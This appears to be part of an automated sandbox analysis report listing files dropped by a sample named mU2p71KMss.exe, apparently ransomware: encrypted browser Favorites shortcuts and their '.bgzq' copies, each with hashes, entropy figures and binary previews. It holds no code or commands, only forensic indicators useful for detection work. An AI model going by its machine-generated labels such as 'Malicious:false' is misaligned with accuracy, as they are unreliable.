                                                                                                SHA-256:D856642B516B5F9B6C1BDED68276D38B1E143203B63E85ED597B773EE0C5201F
                                                                                                SHA-512:7CC33BFC1AB4E0B15E95CA647291197C822A3CF671F2D83EDC8260C81E2BB156C3514DE4613DBB427C7F01917EA3E33F267A20AE340C456B70531FA30AF0F6D4
                                                                                                Malicious:false
                                                                                                Preview:ZIPXY".....[.......1N.So......B.IT......h..@.x...............^.R..UG/.7L..l'........9.._....A,...Q=. (...Tp.DC..'.F? ....&,.NZ.z...n...2........Sy|..s..M.Iz.x&..g.v!..(r.VL..j.5.".2..gl......Hs,..1VQs..G........8...!9.wQOPb..x&.@..A4.cK.....r.......!G.+.M. .)..a.w...S..U`.&..=.@.x....0HiF..D.'...._...l..g..i....U....g/.......p.[=.......f[......J...|A..qt_.DC?@.L..D7...=...d.A*k....a*.Ye..:.y.....n/.>...{...[..V.l.. c....8 ....<"..+~......9.....X.sj..F/..o..2..Q..A/..#..w."..C..hT8....Z...|.>..."..._..R...p..<\.+...u.\s........._Y..*g(S...sN...1....jI.xb..h.N.<..7.>.e?.Y.u.......Q..p.6T..O.....'....>...,.m.....{u..3^.\h..$...)W.dr....}..'O7t6I.h..V..T...Dh...RP.S..5.]..t;nH.[..t-..bk.F3/..=.4..U.=.........{..GZ..... ...J....m..<....)........#^>.r.|..o}.....C.?.^J.."..7..w.E......F71...e..)....../....L\..{.....=..M\..,.H....&..Xym]e..|.m1V.......[.^-.....EQ(.Q_......g.X1.k..MPMtF%...;.'vA.ON.5/.<Y)..../g....A..dY.:.a.&Yw|..s<.d....H..Dz...\

                                                                                                C:\Users\user\Favorites\Amazon.url

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):445
                                                                                                Entropy (8bit):7.4022236621007265
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Lq6XFjAttJ71hhBPxTIdnv7GCSKjXEytzIcii9a:+6VjALJvhBPlIBv7RjXfzIbD
                                                                                                MD5:4B533E114B9CEA922C24B6889929E99D
                                                                                                SHA1:1EA5DCED9B95B756B01CF1C2A22BDF1CCB4EF226
                                                                                                SHA-256:5844E7F94B30429A254906CEE8FD6594692F33F876D2C8FA8F1DB135C1149B6B
                                                                                                SHA-512:92A06C234CD530C209D6A419FA3EB32BB77DBB139BB23EB9037F6C27BEAB4EFEC436F1873929CF18A339891C0754B7008E8EE2A7C22F83C3293578CA288AA06C
                                                                                                Malicious:false
                                                                                                Preview:[{000...%.F(.O.m.o..JY...y..+...M.G!.~O.'.W7..rs8:DdH2..........R........$......t.XyF.a..9.C..Y.W....8.j.:_4}.Q.....@.GT#....^...;...b.O)G:}.w_.:.k.j......A..L.q...L.&.:.#..O......z-'..&.`. .|Dfe....e.w?...l..7.x......!"s..O...1..m.... .Q...9...V$..~>.-m...H.h.tKy7.C..*..1....tY.b.z.]3Lh0...+\..PWe..u..D.b.5.T.+....8/.D..r"g.....U.. R..4T}..,c8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Amazon.url.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):445
                                                                                                Entropy (8bit):7.4022236621007265
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Lq6XFjAttJ71hhBPxTIdnv7GCSKjXEytzIcii9a:+6VjALJvhBPlIBv7RjXfzIbD
                                                                                                MD5:4B533E114B9CEA922C24B6889929E99D
                                                                                                SHA1:1EA5DCED9B95B756B01CF1C2A22BDF1CCB4EF226
                                                                                                SHA-256:5844E7F94B30429A254906CEE8FD6594692F33F876D2C8FA8F1DB135C1149B6B
                                                                                                SHA-512:92A06C234CD530C209D6A419FA3EB32BB77DBB139BB23EB9037F6C27BEAB4EFEC436F1873929CF18A339891C0754B7008E8EE2A7C22F83C3293578CA288AA06C
                                                                                                Malicious:false
                                                                                                Preview:[{000...%.F(.O.m.o..JY...y..+...M.G!.~O.'.W7..rs8:DdH2..........R........$......t.XyF.a..9.C..Y.W....8.j.:_4}.Q.....@.GT#....^...;...b.O)G:}.w_.:.k.j......A..L.q...L.&.:.#..O......z-'..&.`. .|Dfe....e.w?...l..7.x......!"s..O...1..m.... .Q...9...V$..~>.-m...H.h.tKy7.C..*..1....tY.b.z.]3Lh0...+\..PWe..u..D.b.5.T.+....8/.D..r"g.....U.. R..4T}..,c8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Bing.url

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):542
                                                                                                Entropy (8bit):7.61943227151422
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:vr9n2Muh7vQzQGDSapHD20TL8FnCSsNCIHpFpz2uXEytzIcii9a:DJUxaQ4Suj2q8gVsS3XfzIbD
                                                                                                MD5:52DA55E8E49B067C36E62E725BC09AD4
                                                                                                SHA1:0111278F41F0E65B09246A3932DB8C9C71173AF4
                                                                                                SHA-256:D8A616ABFD91FAF81AA789B57F14187802354F755061759078ACF67A813800A2
                                                                                                SHA-512:92251C90D4ABBD57B9DE6C8AC607B5B1A2732341A13BC44D1B8965C9581C16FB3347EDEDE624D312CE4E3B993339434B214336DF06486721F1FADE091A1AE856
                                                                                                Malicious:false
                                                                                                Preview:[{000.8%...!.......R.t...Uoo<...&......;....l...E.R....B..Hz...s......u.......4.{.....Pe.R,@s..".2......u.Z;3?.?@A..4...r......p.....9..;.P.....O~8Y.u..u..N.T.Y'bP..0....().....Q#.'....f.L%.u.c.g..K.d.Q64t.1.#f.+.m.=......q.k.^j=.|...s.4.L....G..o...\^1:.).....M@.\..d....t...m.`.#.eN\.Fw...D .x7f...5u;.....~.y..XQ.@.....BG..MC^.....#.....7..R0!".....{.h.ij2\....a8'...@.=..T_......*D.........n.ve.:N>...*.:0HF.:-.C~.........O..y7,=......>My8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Bing.url.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):542
                                                                                                Entropy (8bit):7.61943227151422
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:vr9n2Muh7vQzQGDSapHD20TL8FnCSsNCIHpFpz2uXEytzIcii9a:DJUxaQ4Suj2q8gVsS3XfzIbD
                                                                                                MD5:52DA55E8E49B067C36E62E725BC09AD4
                                                                                                SHA1:0111278F41F0E65B09246A3932DB8C9C71173AF4
                                                                                                SHA-256:D8A616ABFD91FAF81AA789B57F14187802354F755061759078ACF67A813800A2
                                                                                                SHA-512:92251C90D4ABBD57B9DE6C8AC607B5B1A2732341A13BC44D1B8965C9581C16FB3347EDEDE624D312CE4E3B993339434B214336DF06486721F1FADE091A1AE856
                                                                                                Malicious:false
                                                                                                Preview:[{000.8%...!.......R.t...Uoo<...&......;....l...E.R....B..Hz...s......u.......4.{.....Pe.R,@s..".2......u.Z;3?.?@A..4...r......p.....9..;.P.....O~8Y.u..u..N.T.Y'bP..0....().....Q#.'....f.L%.u.c.g..K.d.Q64t.1.#f.+.m.=......q.k.^j=.|...s.4.L....G..o...\^1:.).....M@.\..d....t...m.`.#.eN\.Fw...D .x7f...5u;.....~.y..XQ.@.....BG..MC^.....#.....7..R0!".....{.h.ij2\....a8'...@.=..T_......*D.........n.ve.:N>...*.:0HF.:-.C~.........O..y7,=......>My8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Facebook.url

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):447
                                                                                                Entropy (8bit):7.388070726496588
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:bBngjhMrgrN+CsewM1aVDWBXEytzIcii9a:9bg5bCM1uWBXfzIbD
                                                                                                MD5:C79F52440F7D3745BCA9993A87355676
                                                                                                SHA1:D30C406ECE3A69257FD1F0B345FBEB775CCE96C3
                                                                                                SHA-256:DB6BB77F94DC975F8A10473A700E9B857D07621C1109200290A3886ACA076BA2
                                                                                                SHA-512:E1AF8ADE8B7E9A8EB762AF70F9227B1E0058AA28BEDCC733CBD807E9DF38988E30875BB832A0294C20B7E1836FBFE1AA9C0ED74EF88494676C80479BE8551C00
                                                                                                Malicious:false
                                                                                                Preview:[{000...].}w..&9j.3.Gs#..P..A>..h...'8.-`p.....Y.H!I..c..-.2.b.....t...a5.zqwy....n8&I<.b..42A.p.4........*.j=.C.[3.......%t%Q.x..H.m.~.....g.Hw+..J.h..t......?74#.B.....6...x>...+.....BE.3.).>.Jk[.......1.l.1.6~.|....}..c.^..1...w>.g..,K...6K.~..P..D.+......1k.}..i.q...(C,..n....tp..S.-..OG...l...<....P7...G..:..r.c.=..GO..f^b..G.D...kN9.Zl...E.J8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Facebook.url.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):447
                                                                                                Entropy (8bit):7.388070726496588
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:bBngjhMrgrN+CsewM1aVDWBXEytzIcii9a:9bg5bCM1uWBXfzIbD
                                                                                                MD5:C79F52440F7D3745BCA9993A87355676
                                                                                                SHA1:D30C406ECE3A69257FD1F0B345FBEB775CCE96C3
                                                                                                SHA-256:DB6BB77F94DC975F8A10473A700E9B857D07621C1109200290A3886ACA076BA2
                                                                                                SHA-512:E1AF8ADE8B7E9A8EB762AF70F9227B1E0058AA28BEDCC733CBD807E9DF38988E30875BB832A0294C20B7E1836FBFE1AA9C0ED74EF88494676C80479BE8551C00
                                                                                                Malicious:false
                                                                                                Preview:[{000...].}w..&9j.3.Gs#..P..A>..h...'8.-`p.....Y.H!I..c..-.2.b.....t...a5.zqwy....n8&I<.b..42A.p.4........*.j=.C.[3.......%t%Q.x..H.m.~.....g.Hw+..J.h..t......?74#.B.....6...x>...+.....BE.3.).>.Jk[.......1.l.1.6~.|....}..c.^..1...w>.g..,K...6K.~..P..D.+......1k.}..i.q...(C,..n....tp..S.-..OG...l...<....P7...G..:..r.c.=..GO..f^b..G.D...kN9.Zl...E.J8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Google.url

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):445
                                                                                                Entropy (8bit):7.4381582635504415
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:DIyvVExO2tmch3VOJ2bR/bHV6vIPNPpGXEytzIcii9a:fdE424MOJ0REa6XfzIbD
                                                                                                MD5:6628ED88E51CA482EF22DC303B095591
                                                                                                SHA1:AECDF583D8936C580CD9DCBF8B5C706B728BC1F3
                                                                                                SHA-256:05D71DB85F54C11976C31C65CC8F4D9A2CE6D85EEB8FB5CDA534DEDEC164DBE7
                                                                                                SHA-512:39E088AB65AC8CD1D36791DE9DE88E8223CC5F8CDF1C7363E991A91E9BB9FF4A9043E38B84A292068E5FD71D6479024F1DD4E4CA6CF16F1D0514D2FD75166B38
                                                                                                Malicious:false
                                                                                                Preview:[{000..o.s'..i=j...qz...#^a.~..60.....T..O....Tfw.....-..L..I.i@..+`......5.....*e&k...:.Uq..L.a8..8...M.J'YDx..e..>.R............Z..k...I...IO...|....j2....."+..<g......e...".L..ayI...... ..j.S...w=.N.inC\F.?....jU.....5.<_..T3-i\...|.a>;.pp.#.RBtA.K1..*>.K.*A...................1..&....&...Z...H.....u..l....RM.f.j.{W...R.y.%.%...;<W|Ocyi.....[yz.8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Google.url.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):445
                                                                                                Entropy (8bit):7.4381582635504415
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:DIyvVExO2tmch3VOJ2bR/bHV6vIPNPpGXEytzIcii9a:fdE424MOJ0REa6XfzIbD
                                                                                                MD5:6628ED88E51CA482EF22DC303B095591
                                                                                                SHA1:AECDF583D8936C580CD9DCBF8B5C706B728BC1F3
                                                                                                SHA-256:05D71DB85F54C11976C31C65CC8F4D9A2CE6D85EEB8FB5CDA534DEDEC164DBE7
                                                                                                SHA-512:39E088AB65AC8CD1D36791DE9DE88E8223CC5F8CDF1C7363E991A91E9BB9FF4A9043E38B84A292068E5FD71D6479024F1DD4E4CA6CF16F1D0514D2FD75166B38
                                                                                                Malicious:false
                                                                                                Preview:[{000..o.s'..i=j...qz...#^a.~..60.....T..O....Tfw.....-..L..I.i@..+`......5.....*e&k...:.Uq..L.a8..8...M.J'YDx..e..>.R............Z..k...I...IO...|....j2....."+..<g......e...".L..ayI...... ..j.S...w=.N.inC\F.?....jU.....5.<_..T3-i\...|.a>;.pp.#.RBtA.K1..*>.K.*A...................1..&....&...Z...H.....u..l....RM.f.j.{W...R.y.%.%...;<W|Ocyi.....[yz.8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Live.url

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):443
                                                                                                Entropy (8bit):7.464196144135486
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:4IlqdvXNHLsDcWf8oQqT8FX7jCs+XEytzIcii9a:44sFvSo57es+XfzIbD
                                                                                                MD5:A998EA323B108E5A2A81B469041ADBDA
                                                                                                SHA1:919AF6E0C1E25024016375313EEFCCDC49C96704
                                                                                                SHA-256:67E1B6382A8C317C342C6FCFD9B52E49A001205B6F5733E9D8F953DEB26F9489
                                                                                                SHA-512:1F5A5783DCFA8752E1A5CEE8374D9400B8B213277EB17DC31963AED1A2F976F2591331C8C74D6106EA4D72C1B062B17FEF7ABBA375347E2BC1603662BD5EF220
                                                                                                Malicious:false
                                                                                                Preview:[{000r7..4R.TZ{1G.R.y..|.....t..A./H_..2[..M;...$.[...^.yI}.s.".u@..O [..6Y..6....8.....bk..;.{9.&.....<S.>...H..lrYo}.n..u.4]}mD.ma9r}..A.B......U../.~...@...!y~.3.....t%Ri.@.U?6.L.,.c.".../.szA.eT.x(.......;~.........x..f.....\g]U.k...."w..=..~......[.p}.)..gDJ..`$....!.m..X...U?..Yr'...o......"z,...C.2...;...0..A.......B...fb>.w.Ni.q.,...B....8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Live.url.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):443
                                                                                                Entropy (8bit):7.464196144135486
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:4IlqdvXNHLsDcWf8oQqT8FX7jCs+XEytzIcii9a:44sFvSo57es+XfzIbD
                                                                                                MD5:A998EA323B108E5A2A81B469041ADBDA
                                                                                                SHA1:919AF6E0C1E25024016375313EEFCCDC49C96704
                                                                                                SHA-256:67E1B6382A8C317C342C6FCFD9B52E49A001205B6F5733E9D8F953DEB26F9489
                                                                                                SHA-512:1F5A5783DCFA8752E1A5CEE8374D9400B8B213277EB17DC31963AED1A2F976F2591331C8C74D6106EA4D72C1B062B17FEF7ABBA375347E2BC1603662BD5EF220
                                                                                                Malicious:false
                                                                                                Preview:[{000r7..4R.TZ{1G.R.y..|.....t..A./H_..2[..M;...$.[...^.yI}.s.".u@..O [..6Y..6....8.....bk..;.{9.&.....<S.>...H..lrYo}.n..u.4]}mD.ma9r}..A.B......U../.~...@...!y~.3.....t%Ri.@.U?6.L.,.c.".../.szA.eT.x(.......;~.........x..f.....\g]U.k...."w..=..~......[.p}.)..gDJ..`$....!.m..X...U?..Yr'...o......"z,...C.2...;...0..A.......B...fb>.w.Ni.q.,...B....8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\NYTimes.url

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):446
                                                                                                Entropy (8bit):7.463495116475813
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:KvXVLhZ5z9aHWckyCDUfzW9j6mSQ00JtXEytzIcii9a:aLH5gHWcL4UfzWw43JtXfzIbD
                                                                                                MD5:DBC2FFF44F7B74FE5EAAA285F59C9AEE
                                                                                                SHA1:43CAB60DB0DEC0FD75C0C6ED03FD8DD9C6D6A76D
                                                                                                SHA-256:331D7075392AA2889B548266A12ABEB804F78F86C96E769481C54BDF76B087B6
                                                                                                SHA-512:7CBD604B52CEA0FE9A765CD5404007035A894C87882E649D1740E19B3FC2250BFE61E2BCEEFEFE0A75D24D348C8202DF3892FD9DAE39165614CCF7BE56132AD1
                                                                                                Malicious:false
                                                                                                Preview:[{000.*......ab..Vp.n.FS....7)bS..`O.zu.j.+...TJ.:...Y..}..rM.b>,.l....X....._.sZ.b..j.k..j.h..........4..7...".....e.I\O..@v..;9......(.LK...(@Y..s.....}C. ..KR.>N.g3.sS..t[.....;~41:....<.@srI|...2..j.b......w../.. >..).u..nwhI..iN..'.i.@8..~B%.(.k3.3..9..?.....).p.`NLd.....d!.v...LIK.=.DaZ.f'4.lx....fkL<.......I....../_k.(.G...n.E..2..x..X8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\NYTimes.url.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):446
                                                                                                Entropy (8bit):7.463495116475813
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:KvXVLhZ5z9aHWckyCDUfzW9j6mSQ00JtXEytzIcii9a:aLH5gHWcL4UfzWw43JtXfzIbD
                                                                                                MD5:DBC2FFF44F7B74FE5EAAA285F59C9AEE
                                                                                                SHA1:43CAB60DB0DEC0FD75C0C6ED03FD8DD9C6D6A76D
                                                                                                SHA-256:331D7075392AA2889B548266A12ABEB804F78F86C96E769481C54BDF76B087B6
                                                                                                SHA-512:7CBD604B52CEA0FE9A765CD5404007035A894C87882E649D1740E19B3FC2250BFE61E2BCEEFEFE0A75D24D348C8202DF3892FD9DAE39165614CCF7BE56132AD1
                                                                                                Malicious:false
                                                                                                Preview:[{000.*......ab..Vp.n.FS....7)bS..`O.zu.j.+...TJ.:...Y..}..rM.b>,.l....X....._.sZ.b..j.k..j.h..........4..7...".....e.I\O..@v..;9......(.LK...(@Y..s.....}C. ..KR.>N.g3.sS..t[.....;~41:....<.@srI|...2..j.b......w../.. >..).u..nwhI..iN..'.i.@8..~B%.(.k3.3..9..?.....).p.`NLd.....d!.v...LIK.=.DaZ.f'4.lx....fkL<.......I....../_k.(.G...n.E..2..x..X8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Reddit.url

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):445
                                                                                                Entropy (8bit):7.444655137768246
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:4mEht9yLWzCkUZGgZX7ypuxLUE7wEQXEytzIcii9a:et2rZCuNUEuXfzIbD
                                                                                                MD5:196D2A262CE4884D77B032D27A84B4B0
                                                                                                SHA1:AD33A133196F7C75F0C909381142C1785F3B7240
                                                                                                SHA-256:BA04B18D8D8B384EF23D51734F6506864E719892A99173D661A02F223EFF9EE1
                                                                                                SHA-512:38867809405C37CAE0BA3DAB28E513B280ED13D3552F927C7747F16D1931B9FF9EE7DE4265E00697428F9FFD6EC1F52CD93CD091E9E1BEFF5EA64DF5FCA71D4F
                                                                                                Malicious:false
                                                                                                Preview:[{000....x..xC..b!..)4..l}.N...g.u.S.v.T.._...."...D...iN........6`....*....1....$..}..Ld.w.=e..Q.b..`.e.g..0C{%.c|.8,9....{...K.H.."..fE..B:_.*.}.T.....b.4{.l]ck,...07..aw.J...M..A.1...\..#rp..8..F.......:..;i...G..V~.I\@So5n.N......+W.;8...(o.....z.......u.4......(s.....=+.C.........U.,dq.G8".|...x..."..h.Y}..b7.4Z..d.a/F.<:...M3.|..g.SU.F8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Reddit.url.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):445
                                                                                                Entropy (8bit):7.444655137768246
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:4mEht9yLWzCkUZGgZX7ypuxLUE7wEQXEytzIcii9a:et2rZCuNUEuXfzIbD
                                                                                                MD5:196D2A262CE4884D77B032D27A84B4B0
                                                                                                SHA1:AD33A133196F7C75F0C909381142C1785F3B7240
                                                                                                SHA-256:BA04B18D8D8B384EF23D51734F6506864E719892A99173D661A02F223EFF9EE1
                                                                                                SHA-512:38867809405C37CAE0BA3DAB28E513B280ED13D3552F927C7747F16D1931B9FF9EE7DE4265E00697428F9FFD6EC1F52CD93CD091E9E1BEFF5EA64DF5FCA71D4F
                                                                                                Malicious:false
                                                                                                Preview:[{000....x..xC..b!..)4..l}.N...g.u.S.v.T.._...."...D...iN........6`....*....1....$..}..Ld.w.=e..Q.b..`.e.g..0C{%.c|.8,9....{...K.H.."..fE..B:_.*.}.T.....b.4{.l]ck,...07..aw.J...M..A.1...\..#rp..8..F.......:..;i...G..V~.I\@So5n.N......+W.;8...(o.....z.......u.4......(s.....=+.C.........U.,dq.G8".|...x..."..h.Y}..b7.4Z..d.a/F.<:...M3.|..g.SU.F8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Twitter.url

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):446
                                                                                                Entropy (8bit):7.369340576465276
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:v9SO0iksMwIByrKxljdQaVJmWWrvkK7fXEytzIcii9a:vDJkcGWa3mPrpXfzIbD
                                                                                                MD5:1D99C1D9CA004E85495FEA5F20424848
                                                                                                SHA1:8897FD14420BB9E49DDEB83639D1D97C0CF07CDB
                                                                                                SHA-256:C51767B5277FBA055B26C26695249DC43A3D4E3916E4CC6D1B22EDCAB680D297
                                                                                                SHA-512:02B6FA2519931ACD22F54C2D346882B36CAC00C1B72085AAA08B727B66C485996622D36DF55E83F401DFD90263AF18B5CF72997AF339A1A9CCB8F96D8C74C7D1
                                                                                                Malicious:false
                                                                                                Preview:[{000q...D1.Vy.(.R...W.%.:...%U..9....y..:.....*.....\.1......}a...(j..9.Q (......." /.....6.F.y".....?W.8..<.0.G0.O...E...".i..H........a\Dh.....TZ._..$.7;..o..B.......e......{],8x..*..#^...{..z.+*[o.....-I.VR>A-6[*.5...|2z.."Q.E........&.!.<."]../..D..G.[...y....1:.U..G...n.F......d....9g...].w{E..YJ/..9..U...t..R".I.d.u. ....../..7.1G8X*.G[8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Twitter.url.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):446
                                                                                                Entropy (8bit):7.369340576465276
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:v9SO0iksMwIByrKxljdQaVJmWWrvkK7fXEytzIcii9a:vDJkcGWa3mPrpXfzIbD
                                                                                                MD5:1D99C1D9CA004E85495FEA5F20424848
                                                                                                SHA1:8897FD14420BB9E49DDEB83639D1D97C0CF07CDB
                                                                                                SHA-256:C51767B5277FBA055B26C26695249DC43A3D4E3916E4CC6D1B22EDCAB680D297
                                                                                                SHA-512:02B6FA2519931ACD22F54C2D346882B36CAC00C1B72085AAA08B727B66C485996622D36DF55E83F401DFD90263AF18B5CF72997AF339A1A9CCB8F96D8C74C7D1
                                                                                                Malicious:false
                                                                                                Preview:[{000q...D1.Vy.(.R...W.%.:...%U..9....y..:.....*.....\.1......}a...(j..9.Q (......." /.....6.F.y".....?W.8..<.0.G0.O...E...".i..H........a\Dh.....TZ._..$.7;..o..B.......e......{],8x..*..#^...{..z.+*[o.....-I.VR>A-6[*.5...|2z.."Q.E........&.!.<."]../..D..G.[...y....1:.U..G...n.F......d....9g...].w{E..YJ/..9..U...t..R".I.d.u. ....../..7.1G8X*.G[8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Wikipedia.url

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):448
                                                                                                Entropy (8bit):7.447429646893992
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:dN1jh9NVhF4RQwP4I8JAHuelofe/NXcvvXEytzIcii9a:Njh9z4izIunfoIvXfzIbD
                                                                                                MD5:9727E5DDE83068A779CE0FA270D593E4
                                                                                                SHA1:91ED92FF9AF673563761EA57C3788FBC62DCA83A
                                                                                                SHA-256:C6CC68081FCB39C083EC954F0684C20C0E4F4AEAD1AB1F0121936BBC39285FD2
                                                                                                SHA-512:C671A9D62EBD46612DD651EA5FB3E74133253ABFCDAAB26386C3B50C6D54A52B9F70D4B19A068A4D1C071821AC0EE9F991F67960A27AA33957BCE3E113EA5CDE
                                                                                                Malicious:false
                                                                                                Preview:[{000tB|....(.K6..M.._:x.w."......H..........x.,`..f.......V..m..c.h ..i.|...d~..u..Y...,x......g.......?..5%.n].^.f..~.NQ.}..c......o...'.L`%r....I^..QD..+..*.v....o.z.nrP...HZ5H...6D5.6j..J.|z4~...9.ao....3.n..Y..l.K...u.X.........}.f.?..a>...1....!...."e...#....G..-|..Z.Q...7.9o..'........w..q2....x....&.y,..W[M.6q..v..v.h.uz.._s/..{.9..h.F}|.%../y/./ph8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Wikipedia.url.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):448
                                                                                                Entropy (8bit):7.447429646893992
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:dN1jh9NVhF4RQwP4I8JAHuelofe/NXcvvXEytzIcii9a:Njh9z4izIunfoIvXfzIbD
                                                                                                MD5:9727E5DDE83068A779CE0FA270D593E4
